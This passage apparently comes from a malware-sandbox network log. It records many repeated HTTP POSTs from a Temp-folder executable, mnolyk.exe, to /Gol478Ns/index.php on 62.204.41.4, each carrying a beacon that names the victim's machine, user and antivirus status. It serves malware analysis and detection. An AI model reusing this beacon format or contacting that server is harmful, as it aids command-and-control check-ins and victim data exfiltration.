                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.379453897 CET773INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        574192.168.2.55026462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:22.564256907 CET774OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.630848885 CET774INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        575192.168.2.55026562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:22.827156067 CET775OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.892991066 CET775INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        576192.168.2.55026662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:23.059191942 CET776OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.127336025 CET776INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        577192.168.2.55026762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:23.304553986 CET777OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.369493961 CET777INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        578192.168.2.55026862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:23.543087006 CET778OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.607664108 CET778INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        579192.168.2.55026962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:23.777740955 CET779OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.841481924 CET779INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        58192.168.2.54974862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:58.336551905 CET259OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.402678013 CET259INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        580192.168.2.55027062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:24.011353970 CET780OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.077202082 CET780INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        581192.168.2.55027162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:24.244810104 CET781OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.308454037 CET781INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        582192.168.2.55027262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:24.480079889 CET782OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.546220064 CET782INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        583192.168.2.55027362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:24.721440077 CET783OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.788153887 CET783INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        584192.168.2.55027462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:24.966329098 CET784OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:25.033452988 CET784INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        585192.168.2.55027562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:25.216519117 CET785OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:25.282788038 CET785INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        59192.168.2.54974962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:58.580579996 CET260OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.645394087 CET260INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.54969662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:30.082324028 CET206OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.151854992 CET207INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        60192.168.2.54975062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:58.814620018 CET261OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.879216909 CET261INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        61192.168.2.54975162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:59.053793907 CET262OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.119268894 CET262INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        62192.168.2.54975262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:59.309365988 CET263OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.375677109 CET263INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        63192.168.2.54975362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:59.551732063 CET264OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.619138002 CET264INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        64192.168.2.54975462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:59.800601959 CET265OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
